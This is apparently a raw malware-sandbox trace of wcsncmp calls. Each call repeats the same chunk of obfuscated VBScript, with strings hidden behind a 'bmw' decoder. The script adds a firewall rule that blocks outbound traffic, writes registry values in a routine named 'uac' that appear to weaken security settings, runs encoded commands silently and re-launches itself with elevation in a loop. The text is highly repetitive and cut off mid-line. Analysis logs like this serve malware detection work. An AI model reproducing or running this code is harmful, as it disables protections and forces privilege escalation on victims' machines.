If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0226.372] wcsncmp (_String1="EIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.372] wcsncmp (_String1="IBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0226.372] wcsncmp (_String1="BSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0226.372] wcsncmp (_String1="SEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0226.372] wcsncmp (_String1="EXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 